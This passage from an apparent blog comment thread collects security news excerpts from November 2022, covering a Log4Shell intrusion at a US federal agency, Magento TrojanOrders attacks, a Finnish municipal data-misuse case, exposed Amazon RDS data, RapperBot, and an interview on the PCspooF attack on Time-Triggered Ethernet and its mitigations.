The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network. “In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC). Compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence, ” the joint advisory reads.
Tomi Engdahl says:
Magento stores targeted in massive surge of TrojanOrders attacks https://www.bleepingcomputer.com/news/security/magento-stores-targeted-in-massive-surge-of-trojanorders-attacks/
At least seven hacking groups are behind a massive surge in TrojanOrders’ attacks targeting Magento 2 websites, exploiting a vulnerability that allows the threat actors to compromise vulnerable servers. Website security firm Sansec warned that almost 40% of Magento 2 websites are being targeted by the attacks, with hacking groups fighting each other over control of an infected site. These attacks are being used to inject malicious JavaScript code into an online store’s website that can cause significant business disruption and massive customer credit card theft during a busy Black Friday and Cyber Monday period. The trend is expected to continue as we head towards Christmas when online shops are at their most critical and simultaneously most vulnerable time.
Tomi Engdahl says:
Laaja tietoturvaloukkaus Turussa kaupungin työntekijä tutkinut kaupunkilaisten henkilötietoja luvattomasti
https://yle.fi/a/74-20004883
Turun kaupungin kasvatuksen ja opetuksen palvelukokonaisuudessa havaittiin perjantaina laaja henkilötietojen tietoturvaloukkaus, jossa viranhaltija on tutkinut ihmisten henkilötietoja varhaiskasvatuksen asiakastietojärjestelmästä, kertoo Turun kaupunki. Tietoturvaloukkaus tapahtui asiakastietojärjestelmän osassa, jossa voi tehdä hakuja kaupungin asukastiedoista. Kaupungin tiedossa ei ole, että työntekijä olisi käyttänyt katselemiaan tietoja asiattomasti. Työntekijän virkasuhde on päätetty. Asiasta on tehty poliisille tutkintapyyntö.
Tomi Engdahl says:
Researchers Discover Hundreds of Amazon RDS Instances Leaking Users’
Personal Data
https://thehackernews.com/2022/11/researchers-discover-hundreds-of-amazon.html
Hundreds of databases on Amazon Relational Database Service (Amazon
RDS) are exposing personal identifiable information (PII), new findings from Mitiga, a cloud incident response company, show.
“Leaking PII in this manner provides a potential treasure trove for threat actors either during the reconnaissance phase of the cyber kill chain or extortionware/ransomware campaigns, ” researchers Ariel Szarf, Doron Karmi, and Lionel Saposnik said in a report shared with The Hacker News. This includes names, email addresses, phone numbers, dates of birth, marital status, car rental information, and even company logins. Amazon RDS is a web service that makes it possible to set up relational databases in the Amazon Web Services (AWS) cloud. It offers support for different database engines such as MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server.
Tomi Engdahl says:
FBI warning: PC and tech support scams are back. Here’s what to watch out for
https://www.zdnet.com/article/fbi-warning-pc-and-tech-support-scams-are-back-heres-what-to-watch-out-for/#ftag=RSSbaffb68
The FBI is warning people to be alert to the threat of technical support scams, in which criminals pose as support staff from computer or software companies and try to trick unsuspecting PC users into giving up access to their bank accounts. The public service announcement by the FBI warns that there have been instances across the US recently of scammers posing as service representatives of software company tech support or computer repair services in attempts to trick victims into following instructions.
Tomi Engdahl says:
Updated RapperBot malware targets game servers in DDoS attacks https://www.bleepingcomputer.com/news/security/updated-rapperbot-malware-targets-game-servers-in-ddos-attacks/
The Mirai-based botnet RapperBot’ has re-emerged via a new campaign that infects IoT devices for DDoS (Distributed Denial of Service) attacks against game servers. The malware was discovered by Fortinet researchers last August when it used SSH brute-forcing to spread on Linux servers. By tracing its activities, the researchers found that RapperBot has been operational since May 2021, but its exact goals were hard to decipher. The motivation of the current campaign is more apparent, as the DoS commands in the latest variant are tailored for attacks against servers hosting online games.
Tomi Engdahl says:
Russian Software Company Pretending to Be American https://www.schneier.com/blog/archives/2022/11/russian-software-company-pretending-to-be-american.html
Computer code developed by a company called Pushwoosh is in about 8,
000 Apple and Google smartphone apps. The company pretends to be American when it is actually Russian. According to company documents publicly filed in Russia and reviewed by Reuters, Pushwoosh is headquartered in the Siberian town of Novosibirsk, where it is registered as a software company that also carries out data processing. It employs around 40 people and reported revenue of 143, 270, 000 rubles ($2.4 mln) last year. Pushwoosh is registered with the Russian government to pay taxes in Russia. On social media and in US regulatory filings, however, it presents itself as a US company, based at various times in California, Maryland, and Washington, DC, Reuters found.
Tomi Engdahl says:
New Ethernet Cyberattack Crunches Critical Systems
PCspooF can interrupt the delicate timing required for technologies used in aerospace and power
https://spectrum.ieee.org/cyberattacks
Ethernet, like all communication networks, continues to get faster with the passing years. In recent years, a subset of ethernet networks, called Time-Triggered Ethernet (TTE), has emerged. TTE networks are built around precise signal timing, using redundant pathways and careful switching to ensure that information arrives precisely when it needs to. Since its introduction, TTE has found a home in flight-critical aircraft systems, NASA spacecraft, and power-generating wind turbines, to name a few.
The consequences for such systems of a TTE network falling out of sync would be understandably catastrophic. Now, researchers have described a first-of-its-kind attack, called PCspooF, that can do just that. The group will be presenting their work at the IEEE Symposium on Security and Privacy conference in May 2023.
To our knowledge, the protocol was first commercialized by TTTech and Honeywell around 2008. GE Fanuc also started developing TTE products for the aviation domain around that time.
It’s hard to identify the first use of TTE for a mission critical system. One of the earliest seems to be by Sikorsky, which started working with TTE technology in 2008, and used it in the S-97 RAIDER helicopter which first flew in 2015. As of 2009, there were also articles published reporting that NASA and Lockheed Martin were using TTE for the Orion Crew Exploration Vehicle, which was originally part of the Constellation Program and is now being used for Artemis.
Today, TTE is used in a range of mission-critical and safety-critical systems and vehicle
Loveless: For context, there is a push in industry right now for large embedded and cyber-physical systems to adopt mixed-criticality networks. This means that instead of using separate networks and buses for non-critical devices and critical devices, there is a push to have one network that both critical and non-critical devices can share. This approach has a lot of benefits, including lower size, weight, and power—in general there are fewer cables and switches—and lower development time and costs, because engineers can focus on using just one technology.
Time-Triggered Ethernet (TTE) is one networking technology that is a part of this trend. Some others include Time Sensitive Networking, SpaceWire and SpaceFibre, RapidIO, AFDX, and more. TTE has multiple different traffic classes that are used over the same network.
Loveless: PCspooF is a new attack on TTE networks. It allows a single Ethernet device, such as a best effort device, with a small amount of malicious circuitry to tear down synchronization of the TTE network for a small amount of time. While this happens, it prevents the critical TTE devices from being able to communicate. [As a result], messages that were sent get dropped. The duration of this effect after each successful attack is around one-half second to one full second.
Importantly, the attack allows the attacker to tear down synchronization on all redundant TTE network planes, even if the attacker is only connected to one of the planes. Also, the attack can be successfully repeated at a high rate (as often as every 10 to 15 seconds).
You mentioned PCspooF is a new attack. Is it also accurate that it’s the first attack to exploit TTE networks?
Loveless: Yes. To our knowledge, PCspooF is the first attack to compromise any of TTE’s guarantees.
Loveless: There are two main vulnerabilities that PCspooF exploits. The first is a vulnerability in Ethernet itself, which is that if an Ethernet switch experiences a sudden reset while a frame is in the middle of being forwarded, the front of that frame can be cut off, and the remainder of the frame will still be sent. PCspooF uses electromagnetic interference to cause this to happen in TTE switches. The attacker stores a malicious message inside a benign frame, sends the frame, then conducts EMI into the switch. The switch then strips the header off the frame and reveals the malicious frame. This mechanism allows the attacker to send a malicious frame that they otherwise should not be allowed to send.
The second vulnerability PCspooF exploits is in the TTE synchronization protocol, which was standardized in SAE AS6802.
If the contents of this messages are malicious, it will cause the TTE devices to lose sync. This is exactly what PCspooF does—it uses the above electromagnetic interference mechanism to spoof this specific protocol control frame (PCF) in order to cause devices to lose sync. Hence the name PCspooF.
Loveless: From studying the SAE AS6802 standard, we determined that the right protocol control frame from a switch could temporarily disrupt sync. From there, the main challenge was to determine how to get that frame into the network
Baris Kasikci: We tested our attack at NASA Johnson Space Center on a testbed with several real TTE switches and end systems.
Kasikci: We identified several different mitigations that are effective against our attack. In general, they fit into two basic categories. The first category is to block a device from conducting electromagnetic interference into your TTE switch. So one way someone could do that would be using fiber Ethernet cables instead of copper, since fiber cannot conduct an electrical signal. Another option would be to use some sort of optical isolator on the cable between your untrusted device and the switch.
Another option is to make it so that, even if the attacker does inject electromagnetic interference into the switch and causes this malicious protocol control frame (PCF) to go out, the system won’t be affected by it. You can do this by altering the topology of your network, so that the spoofed PCFs never follow the same path as legitimate PCFs.
Tomi Engdahl says:
Eggheads show how network flaw could lead to NASA crew pod loss. Key word: Could
Houston, we have a PCspooF problem
https://www.theregister.com/2022/11/15/pcspoof_tte_flaw/